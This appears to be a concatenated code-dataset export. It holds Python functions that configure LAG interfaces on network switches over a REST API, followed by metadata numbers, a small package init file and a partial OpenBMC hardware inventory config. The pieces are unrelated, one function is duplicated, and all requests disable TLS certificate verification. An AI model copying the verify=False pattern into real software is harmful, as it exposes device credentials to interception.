:param desc: Optional description for the interface. Defaults to nothing if not specified.
:param admin_state: Optional administratively-configured state of the port.
Defaults to "up" if not specified
:param kwargs:
keyword s: requests.session object with loaded cookie jar
keyword url: URL in main() function
:return: True if successful, False otherwise
"""
ports_list = port.get_all_ports(**kwargs)
port_name_percents = common_ops._replace_special_characters(name)
if "/rest/v1/system/ports/%s" % port_name_percents not in ports_list:
# Extract LAG ID from LAG name
lag_id = int(re.search('\d+', name).group())
# For each port, add LAG ID to the Interface table entry, and delete the Port table entry
for phys_port in phys_ports:
interface.add_port_to_lag(phys_port, lag_id, **kwargs)
interfaces = ["/rest/v1/system/interfaces/%s" % common_ops._replace_special_characters(phys_port)
for phys_port in phys_ports]
port_data = {"admin": admin_state,
"interfaces": interfaces,
"name": name,
"routing": False,
"vlan_trunks": ["/rest/v1/system/vlans/%d" % vlan_id for vlan_id in vlan_ids_list],
"lacp": lacp_mode,
"other_config": {
"mclag_enabled": mc_lag,
"lacp-fallback": fallback_enabled
},
"vlan_mode": "native-untagged",
"vlan_tag": "/rest/v1/system/vlans/1"
}
if desc is not None:
port_data['description'] = desc
target_url = kwargs["url"] + "system/ports"
post_data = json.dumps(port_data, sort_keys=True, indent=4)
response = kwargs["s"].post(target_url, data=post_data, verify=False)
if not common_ops._response_ok(response, "POST"):
logging.warning("FAIL: Adding Port table entry '%s' failed with status code %d: %s"
% (name, response.status_code, response.text))
return False
else:
logging.info("SUCCESS: Adding Port table entry '%s' succeeded" % name)
return True
else:
logging.info("SUCCESS: No need to add Port table entry '%s' because it already exists"
% name)
return True
def _create_l2_lag_interface(name, phys_ports, lacp_mode="passive", mc_lag=False, fallback_enabled=False,
vlan_ids_list=[], desc=None, admin_state="up", **kwargs):
"""
Perform a POST call to create a Port table entry for L2 LAG interface.
:param name: Alphanumeric name of LAG Port
:param phys_ports: List of physical ports to aggregate (e.g. ["1/1/1", "1/1/2", "1/1/3"])
:param lacp_mode: Should be either "passive" or "active." Defaults to "passive" if not specified.
:param mc_lag: Boolean to determine if the LAG is multi-chassis. Defaults to False if not specified.
:param fallback_enabled: Boolean to determine if the LAG uses LACP fallback. Defaults to False if not specified.
:param vlan_ids_list: Optional list of integer VLAN IDs to add as trunk VLANS. Defaults to empty list if not specified.
:param desc: Optional description for the interface. Defaults to nothing if not specified.
:param admin_state: Optional administratively-configured state of the port.
Defaults to "up" if not specified
:param kwargs:
keyword s: requests.session object with loaded cookie jar
keyword url: URL in main() function
:return: True if successful, False otherwise
"""
ints_dict = interface.get_all_interfaces(**kwargs)
if name not in ints_dict:
# Extract LAG ID from LAG name
lag_id = int(re.search('\d+', name).group())
# For each port, add LAG ID to the Interface table entry
for phys_port in phys_ports:
interface.add_port_to_lag(phys_port, lag_id, **kwargs)
interfaces = ["/rest/v10.04/system/interfaces/%s" % common_ops._replace_special_characters(phys_port)
for phys_port in phys_ports]
int_data = {"admin": admin_state,
"interfaces": interfaces,
"name": name,
"type": "lag",
"routing": False,
"vlan_trunks": ["/rest/v10.04/system/vlans/%d" % vlan_id for vlan_id in vlan_ids_list],
"lacp": lacp_mode,
"other_config": {},
"vlan_mode": "native-untagged",
"vlan_tag": "/rest/v10.04/system/vlans/1"
}
if desc is not None:
int_data['description'] = desc
target_url = kwargs["url"] + "system/interfaces"
post_data = json.dumps(int_data, sort_keys=True, indent=4)
response = kwargs["s"].post(target_url, data=post_data, verify=False)
if not common_ops._response_ok(response, "POST"):
logging.warning("FAIL: Adding Interface table entry '%s' failed with status code %d: %s"
% (name, response.status_code, response.text))
return False
else:
logging.info("SUCCESS: Adding Interface table entry '%s' succeeded" % name)
return True
else:
logging.info("SUCCESS: No need to add Interface table entry '%s' because it already exists"
% name)
return True
def _update_l2_lag_interface(name, mc_lag=False, fallback_enabled=False, **kwargs):
"""
Perform GET and PUT calls to update the Interface table entry for L2 LAG interface.
:param name: Alphanumeric name of LAG Port
:param mc_lag: Boolean to determine if the LAG is multi-chassis. Defaults to False if not specified.
:param fallback_enabled: Boolean to determine if the LAG uses LACP fallback. Defaults to False if not specified.
:param kwargs:
keyword s: requests.session object with loaded cookie jar
keyword url: URL in main() function
:return: True if successful, False otherwise
"""
int_name_percents = common_ops._replace_special_characters(name)
int_data = interface.get_interface(name, 1, "writable", **kwargs)
if int_data['interfaces']:
int_data['interfaces'] = common_ops._dictionary_to_list_values(int_data['interfaces'])
if int_data['vlan_trunks']:
int_data['vlan_trunks'] = common_ops._dictionary_to_list_values(int_data['vlan_trunks'])
if int_data['vlan_tag']:
# Convert the dictionary to a URI string
int_data['vlan_tag'] = common_ops._dictionary_to_string(int_data['vlan_tag'])
int_data['other_config']['mclag_enabled'] = mc_lag
int_data['other_config']['lacp-fallback'] = fallback_enabled
target_url = kwargs["url"] + "system/interfaces/%s" % int_name_percents
put_data = json.dumps(int_data, sort_keys=True, indent=4)
response = kwargs["s"].put(target_url, data=put_data, verify=False)
if not common_ops._response_ok(response, "PUT"):
logging.warning("FAIL: Updating LAG Interface entry '%s' "
"failed with status code %d: %s" % (name, response.status_code, response.text))
return False
else:
logging.info("SUCCESS: Updating LAG Interface entry '%s' "
"succeeded" % name)
return True
def create_l3_lag_interface(name, phys_ports, ipv4, lacp_mode="passive", mc_lag=False, fallback_enabled=False,
desc=None, admin_state="up", vrf="default", **kwargs):
"""
Perform a POST call to create a Port table entry for L3 LAG interface.
:param name: Alphanumeric Port name
:param phys_ports: List of physical ports to aggregate (e.g. ["1/1/1", "1/1/2", "1/1/3"])
:param ipv4: IPv4 address to assign to the interface. Defaults to nothing if not specified.
:param lacp_mode: Should be either "passive" or "active." Defaults to "passive" if not specified.
:param mc_lag: Boolean to determine if the LAG is multi-chassis. Defaults to False if not specified.
:param fallback_enabled: Boolean to determine if the LAG uses LACP fallback. Defaults to False if not specified.
:param desc: Optional description for the interface. Defaults to nothing if not specified.
:param admin_state: Optional administratively-configured state of the port.
Defaults to "up" if not specified
:param vrf: Name of the VRF to which the Port belongs. Defaults to "default" if not specified.
:param kwargs:
keyword s: requests.session object with loaded cookie jar
keyword url: URL in main() function
:return: True if successful, False otherwise
"""
if kwargs["url"].endswith("/v1/"):
return _create_l3_lag_interface_v1(name, phys_ports, ipv4, lacp_mode, mc_lag, fallback_enabled,
desc, admin_state, vrf, **kwargs)
else: # Updated else for when version is v10.04
return _create_l3_lag_interface(name, phys_ports, ipv4, lacp_mode, mc_lag, fallback_enabled,
desc, admin_state, vrf, **kwargs)
def create_l3_lag_interface(name, phys_ports, ipv4, lacp_mode="passive", mc_lag=False, fallback_enabled=False,
desc=None, admin_state="up", vrf="default", **kwargs):
"""
Perform a POST call to create a Port table entry for L3 LAG interface.
:param name: Alphanumeric Port name
:param phys_ports: List of physical ports to aggregate (e.g. ["1/1/1", "1/1/2", "1/1/3"])
:param ipv4: IPv4 address to assign to the interface. Defaults to nothing if not specified.
:param lacp_mode: Should be either "passive" or "active." Defaults to "passive" if not specified.
:param mc_lag: Boolean to determine if the LAG is multi-chassis. Defaults to False if not specified.
:param fallback_enabled: Boolean to determine if the LAG uses LACP fallback. Defaults to False if not specified.
:param desc: Optional description for the interface. Defaults to nothing if not specified.
:param admin_state: Optional administratively-configured state of the port.
Defaults to "up" if not specified
:param vrf: Name of the VRF to which the Port belongs. Defaults to "default" if not specified.
:param kwargs:
keyword s: requests.session object with loaded cookie jar
keyword url: URL in main() function
:return: True if successful, False otherwise
"""
if kwargs["url"].endswith("/v1/"):
return _create_l3_lag_interface_v1(name, phys_ports, ipv4, lacp_mode, mc_lag, fallback_enabled,
desc, admin_state, vrf, **kwargs)
else: # Updated else for when version is v10.04
return _create_l3_lag_interface(name, phys_ports, ipv4, lacp_mode, mc_lag, fallback_enabled,
desc, admin_state, vrf, **kwargs)
def _create_l3_lag_interface_v1(name, phys_ports, ipv4, lacp_mode="passive", mc_lag=False, fallback_enabled=False,
desc=None, admin_state="up", vrf="default", **kwargs):
"""
Perform a POST call to create a Port table entry for L3 LAG interface.
:param name: Alphanumeric Port name
:param phys_ports: List of physical ports to aggregate (e.g. ["1/1/1", "1/1/2", "1/1/3"])
:param ipv4: IPv4 address to assign to the interface. Defaults to nothing if not specified.
:param lacp_mode: Should be either "passive" or "active." Defaults to "passive" if not specified.
:param mc_lag: Boolean to determine if the LAG is multi-chassis. Defaults to False if not specified.
:param fallback_enabled: Boolean to determine if the LAG uses LACP fallback. Defaults to False if not specified.
:param desc: Optional description for the interface. Defaults to nothing if not specified.
:param admin_state: Optional administratively-configured state of the port.
Defaults to "up" if not specified
:param vrf: Name of the VRF to which the Port belongs. Defaults to "default" if not specified.
:param kwargs:
keyword s: requests.session object with loaded cookie jar
keyword url: URL in main() function
:return: True if successful, False otherwise
"""
ports_list = port.get_all_ports(**kwargs)
port_name_percents = common_ops._replace_special_characters(name)
if "/rest/v1/system/ports/%s" % port_name_percents not in ports_list:
# Extract LAG ID from LAG name
lag_id = int(re.search('\d+', name).group())
# For each port, add LAG ID to the Interface table entry, and delete the Port table entry
for phys_port in phys_ports:
interface.add_port_to_lag(phys_port, lag_id, **kwargs)
interfaces = ["/rest/v1/system/interfaces/%s" % common_ops._replace_special_characters(phys_port)
for phys_port in phys_ports]
port_data = {"admin": admin_state,
"interfaces": interfaces,
"name": name,
"routing": True,
"vrf": "/rest/v1/system/vrfs/%s" % vrf,
"ip4_address": ipv4,
"lacp": lacp_mode,
"other_config": {
"mclag_enabled": mc_lag,
"lacp-fallback": fallback_enabled
},
}
if desc is not None:
port_data['description'] = desc
if ipv4 is not None:
port_data['ip4_address'] = ipv4
target_url = kwargs["url"] + "system/ports"
post_data = json.dumps(port_data, sort_keys=True, indent=4)
response = kwargs["s"].post(target_url, data=post_data, verify=False)
if not common_ops._response_ok(response, "POST"):
logging.warning("FAIL: Adding Port table entry '%s' failed with status code %d: %s"
% (name, response.status_code, response.text))
return False
else:
logging.info("SUCCESS: Adding Port table entry '%s' succeeded" % name)
return True
else:
logging.info("SUCCESS: No need to add Port table entry '%s' because it already exists"
% name)
return True
def _create_l3_lag_interface(name, phys_ports, ipv4, lacp_mode="passive", mc_lag=False, fallback_enabled=False,
desc=None, admin_state="up", vrf="default", **kwargs):
"""
Perform a POST call to create a Port table entry for L3 LAG interface.
:param name: Alphanumeric Port name
:param phys_ports: List of physical ports to aggregate (e.g. ["1/1/1", "1/1/2", "1/1/3"])
:param ipv4: IPv4 address to assign to the interface. Defaults to nothing if not specified.
:param lacp_mode: Should be either "passive" or "active." Defaults to "passive" if not specified.
:param mc_lag: Boolean to determine if the LAG is multi-chassis. Defaults to False if not specified.
:param fallback_enabled: Boolean to determine if the LAG uses LACP fallback. Defaults to False if not specified.
:param desc: Optional description for the interface. Defaults to nothing if not specified.
:param admin_state: Optional administratively-configured state of the port.
Defaults to "up" if not specified
:param vrf: Name of the VRF to which the Port belongs. Defaults to "default" if not specified.
:param kwargs:
keyword s: requests.session object with loaded cookie jar
keyword url: URL in main() function
:return: True if successful, False otherwise
"""
ints_dict = interface.get_all_interfaces(**kwargs)
if name not in ints_dict:
# Extract LAG ID from LAG name
lag_id = int(re.search('\d+', name).group())
# For each port, add LAG ID to the Interface table entry, and delete the Port table entry
for phys_port in phys_ports:
interface.add_port_to_lag(phys_port, lag_id, **kwargs)
interfaces = ["/rest/v10.04/system/interfaces/%s" % common_ops._replace_special_characters(phys_port)
for phys_port in phys_ports]
int_data = {"admin": admin_state,
"interfaces": interfaces,
"name": name,
"type": "lag",
"vrf": "/rest/v10.04/system/vrfs/%s" % vrf,
"routing": True,
"ip4_address": ipv4,
"lacp": lacp_mode,
# "other_config": {
# "mclag_enabled": mc_lag,
# "lacp-fallback": fallback_enabled
# }
}
"""commented out the other_config since it causes error"""
if desc is not None:
int_data['description'] = desc
target_url = kwargs["url"] + "system/interfaces"
post_data = json.dumps(int_data, sort_keys=True, indent=4)
response = kwargs["s"].post(target_url, data=post_data, verify=False)
if not common_ops._response_ok(response, "POST"):
logging.warning("FAIL: Adding Interface table entry '%s' failed with status code %d: %s"
% (name, response.status_code, response.text))
return False
else:
logging.info("SUCCESS: Adding Interface table entry '%s' succeeded" % name)
return True
else:
logging.info("SUCCESS: No need to add Interface table entry '%s' because it already exists"
% name)
return True
def delete_lag_interface(name, phys_ports, **kwargs):
"""
Perform a DELETE call to delete a LAG interface. For v1, also remove the LAG ID from the port's Interface,
and create the associated Port table entry.
:param name: Alphanumeric name of LAG interface
:param phys_ports: List of physical ports to aggregate (e.g. ["1/1/1", "1/1/2", "1/1/3"])
:param kwargs:
keyword s: requests.session object with loaded cookie jar
keyword url: URL in main() function
:return: True if successful, False otherwise
"""
if kwargs["url"].endswith("/v1/"):
return _delete_lag_interface_v1(name, phys_ports, **kwargs)
else: # Updated else for when version is v10.04
return _delete_lag_interface(name, phys_ports, **kwargs)
def _delete_lag_interface_v1(name, phys_ports, **kwargs):
"""
Perform a DELETE call to delete a LAG interface. Also, for each physical port, create the associated Port table
entry, and remove the LAG ID from the Port and Interface entries by initializing them to default state.
:param name: Alphanumeric name of LAG interface
:param phys_ports: List of physical ports to aggregate (e.g. ["1/1/1", "1/1/2", "1/1/3"])
:param kwargs:
keyword s: requests.session object with loaded cookie jar
keyword url: URL in main() function
:return: True if successful, False otherwise
"""
success = interface.delete_interface(name, **kwargs)
# For each port, create a Port table entry, then initialize the Port and Interface entries to remove LAG
for phys_port in phys_ports:
success = success and interface.add_l2_interface(phys_port, **kwargs)
success = success and port.initialize_port_entry(phys_port, **kwargs)
return success
def _delete_lag_interface(name, phys_ports, **kwargs):
"""
Perform a DELETE call to delete a LAG interface. Also, for each physical port, remove the LAG ID from the Interface
entries by initializing them to default state.
:param name: Alphanumeric name of LAG interface
:param phys_ports: List of physical ports to aggregate (e.g. ["1/1/1", "1/1/2", "1/1/3"])
:param kwargs:
keyword s: requests.session object with loaded cookie jar
keyword url: URL in main() function
:return: True if successful, False otherwise
"""
success = interface.delete_interface(name, **kwargs)
# For each port, initialize the Interface entry to remove LAG
for phys_port in phys_ports:
success = success and interface.initialize_interface_entry(phys_port, **kwargs)
return success
| 48.252588
| 123
| 0.648846
| 3,175
| 23,306
| 4.617323
| 0.064252
| 0.018076
| 0.045839
| 0.06221
| 0.939086
| 0.924284
| 0.907026
| 0.892633
| 0.878854
| 0.872306
| 0
| 0.012194
| 0.261092
| 23,306
| 482
| 124
| 48.352697
| 0.839092
| 0.436669
| 0
| 0.742081
| 0
| 0
| 0.160736
| 0.026144
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049774
| false
| 0.031674
| 0.027149
| 0
| 0.190045
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6abaa6dd865776b0aef97c49582983bda9e2861a
| 121
|
py
|
Python
|
docknv/project/__init__.py
|
sharingcloud/docknv
|
6eec6a576a32cb05278b7af045f90859066c9f1d
|
[
"MIT"
] | null | null | null |
docknv/project/__init__.py
|
sharingcloud/docknv
|
6eec6a576a32cb05278b7af045f90859066c9f1d
|
[
"MIT"
] | null | null | null |
docknv/project/__init__.py
|
sharingcloud/docknv
|
6eec6a576a32cb05278b7af045f90859066c9f1d
|
[
"MIT"
] | null | null | null |
"""Project module."""
from .models import * # noqa
from .exceptions import * # noqa
# from .methods import * # noqa
| 17.285714
| 33
| 0.644628
| 14
| 121
| 5.571429
| 0.571429
| 0.384615
| 0.358974
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.214876
| 121
| 6
| 34
| 20.166667
| 0.821053
| 0.46281
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6ae00fc6e4ad0d83dd30c30a08b1f5af4d6b9a67
| 23,023
|
py
|
Python
|
data/Witherspoon.py
|
warp5tw/openbmc-test-automation
|
9c85c2df6cbacbd48c7c4962aef39e03814932cc
|
[
"Apache-2.0"
] | 5
|
2021-10-07T15:36:37.000Z
|
2022-03-01T07:21:49.000Z
|
data/Witherspoon.py
|
warp5tw/openbmc-test-automation
|
9c85c2df6cbacbd48c7c4962aef39e03814932cc
|
[
"Apache-2.0"
] | null | null | null |
data/Witherspoon.py
|
warp5tw/openbmc-test-automation
|
9c85c2df6cbacbd48c7c4962aef39e03814932cc
|
[
"Apache-2.0"
] | 1
|
2022-03-01T07:21:51.000Z
|
2022-03-01T07:21:51.000Z
|
#! /usr/bin/python
# System states
# state can change to next state in 2 ways:
# - a process emits a GotoSystemState signal with state name to goto
# - objects specified in EXIT_STATE_DEPEND have started
SYSTEM_STATES = [
'BASE_APPS',
'BMC_STARTING',
'BMC_READY',
'HOST_POWERING_ON',
'HOST_POWERED_ON',
'HOST_BOOTING',
'HOST_BOOTED',
'HOST_POWERED_OFF',
]
EXIT_STATE_DEPEND = {
'BASE_APPS': {
'/org/openbmc/sensors': 0,
},
'BMC_STARTING': {
'/org/openbmc/control/chassis0': 0,
'/org/openbmc/control/power0': 0,
'/org/openbmc/control/flash/bios': 0,
},
}
FRU_INSTANCES = {
'<inventory_root>/system': {'fru_type': 'SYSTEM', 'is_fru': True, 'present': "True"},
'<inventory_root>/system/bios': {'fru_type': 'SYSTEM', 'is_fru': True, 'present': "True"},
'<inventory_root>/system/misc': {'fru_type': 'SYSTEM', 'is_fru': False, },
'<inventory_root>/system/chassis': {'fru_type': 'SYSTEM', 'is_fru': True, 'present': "True"},
'<inventory_root>/system/chassis/motherboard': {'fru_type': 'MAIN_PLANAR', 'is_fru': True, },
'<inventory_root>/system/systemevent': {'fru_type': 'SYSTEM_EVENT', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/refclock': {'fru_type': 'MAIN_PLANAR', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/pcieclock': {'fru_type': 'MAIN_PLANAR', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/todclock': {'fru_type': 'MAIN_PLANAR', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/apss': {'fru_type': 'MAIN_PLANAR', 'is_fru': False, },
'<inventory_root>/system/chassis/fan0': {'fru_type': 'FAN', 'is_fru': True, },
'<inventory_root>/system/chassis/fan1': {'fru_type': 'FAN', 'is_fru': True, },
'<inventory_root>/system/chassis/fan2': {'fru_type': 'FAN', 'is_fru': True, },
'<inventory_root>/system/chassis/fan3': {'fru_type': 'FAN', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/bmc': {'fru_type': 'BMC', 'is_fru': False,
'manufacturer': 'ASPEED'},
'<inventory_root>/system/chassis/motherboard/cpu0': {'fru_type': 'CPU', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/cpu1': {'fru_type': 'CPU', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/cpu0/core0': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu0/core1': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu0/core2': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu0/core3': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu0/core4': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu0/core5': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu0/core6': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu0/core7': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu0/core8': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu0/core9': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu0/core10': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu0/core11': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu1/core0': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu1/core1': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu1/core2': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu1/core3': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu1/core4': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu1/core5': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu1/core6': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu1/core7': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu1/core8': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu1/core9': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu1/core10': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/cpu1/core11': {'fru_type': 'CORE', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/membuf0': {'fru_type': 'MEMORY_BUFFER', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/membuf1': {'fru_type': 'MEMORY_BUFFER', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/membuf2': {'fru_type': 'MEMORY_BUFFER', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/membuf3': {'fru_type': 'MEMORY_BUFFER', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/membuf4': {'fru_type': 'MEMORY_BUFFER', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/membuf5': {'fru_type': 'MEMORY_BUFFER', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/membuf6': {'fru_type': 'MEMORY_BUFFER', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/membuf7': {'fru_type': 'MEMORY_BUFFER', 'is_fru': False, },
'<inventory_root>/system/chassis/motherboard/dimm0': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm1': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm2': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm3': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm4': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm5': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm6': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm7': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm8': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm9': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm10': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm11': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm12': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm13': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm14': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm15': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm16': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm17': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm18': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm19': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm20': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm21': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm22': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm23': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm24': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm25': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm26': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm27': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm28': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm29': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm30': {'fru_type': 'DIMM', 'is_fru': True, },
'<inventory_root>/system/chassis/motherboard/dimm31': {'fru_type': 'DIMM', 'is_fru': True, },
}
ID_LOOKUP = {
'FRU': {
0x01: '<inventory_root>/system/chassis/motherboard/cpu0',
0x02: '<inventory_root>/system/chassis/motherboard/cpu1',
0x03: '<inventory_root>/system/chassis/motherboard',
0x04: '<inventory_root>/system/chassis/motherboard/membuf0',
0x05: '<inventory_root>/system/chassis/motherboard/membuf1',
0x06: '<inventory_root>/system/chassis/motherboard/membuf2',
0x07: '<inventory_root>/system/chassis/motherboard/membuf3',
0x08: '<inventory_root>/system/chassis/motherboard/membuf4',
0x09: '<inventory_root>/system/chassis/motherboard/membuf5',
0x0c: '<inventory_root>/system/chassis/motherboard/dimm0',
0x0d: '<inventory_root>/system/chassis/motherboard/dimm1',
0x0e: '<inventory_root>/system/chassis/motherboard/dimm2',
0x0f: '<inventory_root>/system/chassis/motherboard/dimm3',
0x10: '<inventory_root>/system/chassis/motherboard/dimm4',
0x11: '<inventory_root>/system/chassis/motherboard/dimm5',
0x12: '<inventory_root>/system/chassis/motherboard/dimm6',
0x13: '<inventory_root>/system/chassis/motherboard/dimm7',
0x14: '<inventory_root>/system/chassis/motherboard/dimm8',
0x15: '<inventory_root>/system/chassis/motherboard/dimm9',
0x16: '<inventory_root>/system/chassis/motherboard/dimm10',
0x17: '<inventory_root>/system/chassis/motherboard/dimm11',
0x18: '<inventory_root>/system/chassis/motherboard/dimm12',
0x19: '<inventory_root>/system/chassis/motherboard/dimm13',
0x1a: '<inventory_root>/system/chassis/motherboard/dimm14',
0x1b: '<inventory_root>/system/chassis/motherboard/dimm15',
0x1c: '<inventory_root>/system/chassis/motherboard/dimm16',
0x1d: '<inventory_root>/system/chassis/motherboard/dimm17',
0x1e: '<inventory_root>/system/chassis/motherboard/dimm18',
0x1f: '<inventory_root>/system/chassis/motherboard/dimm19',
0x20: '<inventory_root>/system/chassis/motherboard/dimm20',
0x21: '<inventory_root>/system/chassis/motherboard/dimm21',
0x22: '<inventory_root>/system/chassis/motherboard/dimm22',
0x23: '<inventory_root>/system/chassis/motherboard/dimm23',
0x24: '<inventory_root>/system/chassis/motherboard/dimm24',
0x25: '<inventory_root>/system/chassis/motherboard/dimm25',
0x26: '<inventory_root>/system/chassis/motherboard/dimm26',
0x27: '<inventory_root>/system/chassis/motherboard/dimm27',
0x28: '<inventory_root>/system/chassis/motherboard/dimm28',
0x29: '<inventory_root>/system/chassis/motherboard/dimm29',
0x2a: '<inventory_root>/system/chassis/motherboard/dimm30',
0x2b: '<inventory_root>/system/chassis/motherboard/dimm31',
},
'FRU_STR': {
'PRODUCT_0': '<inventory_root>/system/bios',
'BOARD_1': '<inventory_root>/system/chassis/motherboard/cpu0',
'BOARD_2': '<inventory_root>/system/chassis/motherboard/cpu1',
'CHASSIS_3': '<inventory_root>/system/chassis/motherboard',
'BOARD_3': '<inventory_root>/system/misc',
'BOARD_4': '<inventory_root>/system/chassis/motherboard/membuf0',
'BOARD_5': '<inventory_root>/system/chassis/motherboard/membuf1',
'BOARD_6': '<inventory_root>/system/chassis/motherboard/membuf2',
'BOARD_7': '<inventory_root>/system/chassis/motherboard/membuf3',
'BOARD_8': '<inventory_root>/system/chassis/motherboard/membuf4',
'BOARD_9': '<inventory_root>/system/chassis/motherboard/membuf5',
'BOARD_10': '<inventory_root>/system/chassis/motherboard/membuf6',
'BOARD_11': '<inventory_root>/system/chassis/motherboard/membuf7',
'PRODUCT_12': '<inventory_root>/system/chassis/motherboard/dimm0',
'PRODUCT_13': '<inventory_root>/system/chassis/motherboard/dimm1',
'PRODUCT_14': '<inventory_root>/system/chassis/motherboard/dimm2',
'PRODUCT_15': '<inventory_root>/system/chassis/motherboard/dimm3',
'PRODUCT_16': '<inventory_root>/system/chassis/motherboard/dimm4',
'PRODUCT_17': '<inventory_root>/system/chassis/motherboard/dimm5',
'PRODUCT_18': '<inventory_root>/system/chassis/motherboard/dimm6',
